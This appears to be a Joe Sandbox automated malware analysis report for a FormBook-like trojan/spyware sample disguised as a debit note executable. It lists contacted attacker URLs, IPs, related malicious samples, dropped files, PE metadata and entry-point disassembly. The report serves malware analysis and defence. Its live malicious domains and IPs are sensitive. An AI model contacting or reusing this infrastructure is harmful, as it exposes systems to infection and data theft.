                                                        http://www.sibeta.info/4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.dwmdconsulting.llc/kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.5hdgb2p9a.buzz/lxjv/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.energyparks.net/87jo/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.prediksipreman.fyi/fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.98yl9900.vip/vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.5hdgb2p9a.buzz/lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU=true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.budged.net/rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.electronify.shop/3ase/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jivatop.online/kbf1/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.time-change.fyi/tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mjmegartravel.online/vzdg/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.sibeta.info/4ecw/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.energyparks.net/87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.dwmdconsulting.llc/kz8j/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.time-change.fyi/tc13/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabxcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.onamae.com/?banner_id=634xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/ac/?q=xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoxcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gmo.jp/images/public/common/logo.gifxcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.ecosia.org/newtab/xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.comxcopy.exe, 00000006.00000002.4098892628.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000004106000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4100845977.0000000006540000.00000004.00000800.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003776000.00000004.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004598000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.onamae-server.com/xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referxcopy.exe, 00000006.00000002.4098892628.0000000004298000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003908000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jivatop.onlinePMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        162.0.215.244
                                                        prediksipreman.fyiCanada
                                                        35893ACPCAtrue
                                                        217.160.0.111
                                                        www.time-change.fyiGermany
                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                        162.0.231.203
                                                        www.sibeta.infoCanada
                                                        22612NAMECHEAP-NETUStrue
                                                        168.76.221.252
                                                        www.5hdgb2p9a.buzzSouth Africa
                                                        265240ULTRANETSERVICOSEMINTERNETLTDABRtrue
                                                        76.223.67.189
                                                        mjmegartravel.onlineUnited States
                                                        16509AMAZON-02UStrue
                                                        199.59.243.227
                                                        www.cursosonline.bioUnited States
                                                        395082BODIS-NJUStrue
                                                        104.21.3.144
                                                        www.98yl9900.vipUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        84.32.84.32
                                                        electronify.shopLithuania
                                                        33922NTT-LT-ASLTtrue
                                                        150.95.254.16
                                                        www.j252mv.siteJapan7506INTERQGMOInternetIncJPtrue
                                                        195.154.200.15
                                                        budged.netFrance
                                                        12876OnlineSASFRtrue
                                                        3.33.130.190
                                                        dwmdconsulting.llcUnited States
                                                        8987AMAZONEXPANSIONGBtrue
                                                        185.179.189.193
                                                        www.jivatop.onlineRussian Federation
                                                        44094WEBHOST1-ASRUtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1548308
                                                        Start date and time:2024-11-04 10:09:06 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 32s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:debitnote607-36099895.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@14/12
                                                        EGA Information:
                                                        • Successful, ratio: 80%
                                                        HCA Information:
                                                        • Successful, ratio: 88%
                                                        • Number of executed functions: 35
                                                        • Number of non-executed functions: 319
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • VT rate limit hit for: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
                                                        TimeTypeDescription
                                                        04:11:13API Interceptor9571791x Sleep call for process: xcopy.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        162.0.215.244NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                        • www.prediksipreman.fyi/3lre/
                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.prediksipreman.fyi/3lre/
                                                        PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                        • www.prediksipreman.fyi/3lre/
                                                        http://mirchmasala2go.comGet hashmaliciousUnknownBrowse
                                                        • mirchmasala2go.com/
                                                        217.160.0.111NNj87.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/ve3w/
                                                        NJjU88.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/ve3w/
                                                        BHYIOPIj.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/ve3w/
                                                        eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/mcz6/
                                                        H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/mcz6/
                                                        Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.carliente.com/ntpp/
                                                        Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.carliente.com/ntpp/
                                                        Factura (3).exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/mcz6/
                                                        JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.carliente.com/ntpp/
                                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                        • www.carliente.com/3g97/?iJdtI=UBp4nvRH&-b=pss1I4hPKcXAgTePnemGc7FXasx9qfjLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslIPQEm/bcAIhxallCZA6vttiGmo3Ak8A==
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.5hdgb2p9a.buzzA4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                        • 168.76.221.252
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ONEANDONE-ASBrauerstrasse48DEkWcgTHdqyB.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 87.106.236.48
                                                        ARw1Gy3UsZ.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 87.106.236.48
                                                        Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                        • 94.143.137.213
                                                        Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                        • 82.165.70.65
                                                        vTvt7ezxnl.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 87.106.236.48
                                                        LpzvKHFnGD.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 87.106.236.48
                                                        Reservation Detail Booking.com ID4336.vbsGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                                        • 212.227.67.33
                                                        https://myabd.co.uk/main/arull.php?7080797967704b53693230746450544d6f737a6b6a4e533076544b7972566438774a38394d4841413d3d#EMAILBASE64#Get hashmaliciousHTMLPhisherBrowse
                                                        • 217.160.0.3
                                                        https://www.google.se/url?q=%25CHAR5fgdrehsuabfolb&rct=%25CHAR4ndgsTYhfgyrv452jbsda&sa=t&esrc=Rgxldhffsbxhds&source=&cd=ZyB0byB5b3Ugbm=BAowunbc&ved=NmsnjdowpteqndyCBtY=&url=amp/reformasvaesma.es/pujrtqdguyr?eyCBtYgRFnRgxLmVnPvGet hashmaliciousUnknownBrowse
                                                        • 82.223.67.146
                                                        xLgTQcFdIJ.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 87.106.236.48
                                                        NAMECHEAP-NETUSQNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.238.246
                                                        URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                        • 162.0.225.218
                                                        6724f91d7b548.vbsGet hashmaliciousUnknownBrowse
                                                        • 198.54.116.219
                                                        #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.htaGet hashmaliciousUnknownBrowse
                                                        • 198.54.116.219
                                                        6724c67fe2634.vbsGet hashmaliciousUnknownBrowse
                                                        • 192.64.117.206
                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • 199.188.200.195
                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • 199.188.200.195
                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • 199.188.200.195
                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • 199.188.200.195
                                                        ACPCAQNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.209.213
                                                        IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.211.143
                                                        A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.211.143
                                                        draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.211.143
                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.215.244
                                                        Contrato.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        FACTURA - FOB-78787-5677__________________pif.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.215.244
                                                        Se adjuntan los documentos de env#U00edo originales DHL.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\xcopy.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):287232
                                                        Entropy (8bit):7.995872281780949
                                                        Encrypted:true
                                                        SSDEEP:6144:1rnDGXRdnSvtI416luDNZwLg6cY7W/mNR1qo+Xg/hf7:1bgdnS110uD7hoW+V7Wg/5
                                                        MD5:3EC70EAEEE12F47AB0D61BF6050FF279
                                                        SHA1:A69C151FFD40CDE8F7012C1CFDEE17607E236D30
                                                        SHA-256:8B3FDF5583F39B7B99AB08C0067759D59E64779A86C1520BB3DF94E3C4F68258
                                                        SHA-512:6FD25147116CA251B86351F68B4C286FA39E8E059162642521C50B92264999B92DD6A1816E2B6817483C3EC2236EEA8C9C0A2A09A1DC7F3D97E6C671C3914C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.jqg.E5AR...A.....0O..eZ?...045HE5ARKG6H6IVQ1P0LRAXMY7T5J0.5HE;^.EG.A.h.P}...:(+m)E;R8QY.+$[/=?gT-.;#?.9^l...m4X0Pd=9?lE5ARKG617@.lQ7.q2&.p9P./...(".[...(Q.L....,5..$:_iU-.45HE5ARK.sH6.WP1....AXMY7T5J.47IN4JRK.2H6IVQ1P0L.RXMY'T5JP05HEuAR[G6H4IVW1P0LRAXKY7T5J045(A5APKG6H6ITQq.0LBAX]Y7T5Z04%HE5ARKW6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY. P2D45HazERKW6H6.RQ1@0LRAXMY7T5J045hE5!RKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.428379052156488
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
                                                        File size:1'627'136 bytes
                                                        MD5:a60ae01b598fd87cbc1ed78936ded2e6
                                                        SHA1:3a9bb16caa197dde7190a1bd9b2ac86713ab09a2
                                                        SHA256:a9b71509abbfcf9ed2120614204bd47ab10bd54cd7b0b2a4b89eed3b559a0fae
                                                        SHA512:df4986d59c0c71cbcc55f4f25736d5be656dd12d7e2cf8770076555861732cfbe94c42dff9b447e78338ed8ff3778a0b1cfcd902768e3a23e7bfdaafc29dada6
                                                        SSDEEP:24576:gqDEvCTbMWu7rQYlBQcBiT6rprG8adYyZ7wLMXlZq19WaelgTVmveY+D+Kifyi:gTvC/MTQYxsWR7adN+Tag8veEf
                                                        TLSH:C075E1027391C022FF9BA2334B56F6115BBC7A660123E62F13981D79BE705B1563E7A3
                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x420577
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x672413EA [Thu Oct 31 23:34:02 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:948cc502fe9226992dce9417f952fce3
                                                        Instruction
                                                        call 00007FED893C3333h
                                                        jmp 00007FED893C2C3Fh
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FED893C2E1Dh
                                                        mov dword ptr [esi], 0049FDF0h
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FDF8h
                                                        mov dword ptr [ecx], 0049FDF0h
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FED893C2DEAh
                                                        mov dword ptr [esi], 0049FE0Ch
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FE14h
                                                        mov dword ptr [ecx], 0049FE0Ch
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDD0h
                                                        and dword ptr [eax], 00000000h
                                                        and dword ptr [eax+04h], 00000000h
                                                        push eax
                                                        mov eax, dword ptr [ebp+08h]
                                                        add eax, 04h
                                                        push eax
                                                        call 00007FED893C59DDh
                                                        pop ecx
                                                        pop ecx
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        lea eax, dword ptr [ecx+04h]
                                                        mov dword ptr [ecx], 0049FDD0h
                                                        push eax
                                                        call 00007FED893C5A28h
                                                        pop ecx
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDD0h
                                                        push eax
                                                        call 00007FED893C5A11h
                                                        test byte ptr [ebp+08h], 00000001h
                                                        pop ecx
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb687c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x18b0000x7594.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xd40000xb687c0xb6a0056d32e9f0e0291860d4566e5f497be81False0.9649747604380561data7.965956412705366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x18b0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                        RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
